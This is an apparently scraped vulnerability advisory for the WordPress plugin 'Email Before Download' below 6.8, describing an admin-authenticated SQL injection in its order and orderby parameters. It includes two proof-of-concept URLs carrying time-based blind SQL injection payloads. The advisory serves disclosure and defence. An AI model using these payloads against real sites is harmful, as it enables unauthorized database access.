Lucene search

K
wpexploitAnton SarsadskikhWPEX-ID:A8625B84-337D-4C4D-A698-73E59D1F8EE1
HistoryNov 01, 2021 - 12:00 a.m.

Email Before Download < 6.8 - Admin+ SQL Injection

2021-11-0100:00:00
Anton Sarsadskikh
325

0.001 Low

EPSS

Percentile

37.7%

The plugin does not properly validate and escape the order and orderby GET parameters before using them in SQL statements, leading to authenticated SQL injection issues

https://example.com/wp-admin/admin.php?page=email-before-download-links&order=desc&orderby=time_requested+AND+%28SELECT+1554+FROM+%28SELECT%28SLEEP%285%29%29%29gPZH%29

https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby=time_requested&order=+AND+%28SELECT+42+FROM+%28SELECT%28SLEEP%285%29%29%29b%29

0.001 Low

EPSS

Percentile

37.7%

Related for WPEX-ID:A8625B84-337D-4C4D-A698-73E59D1F8EE1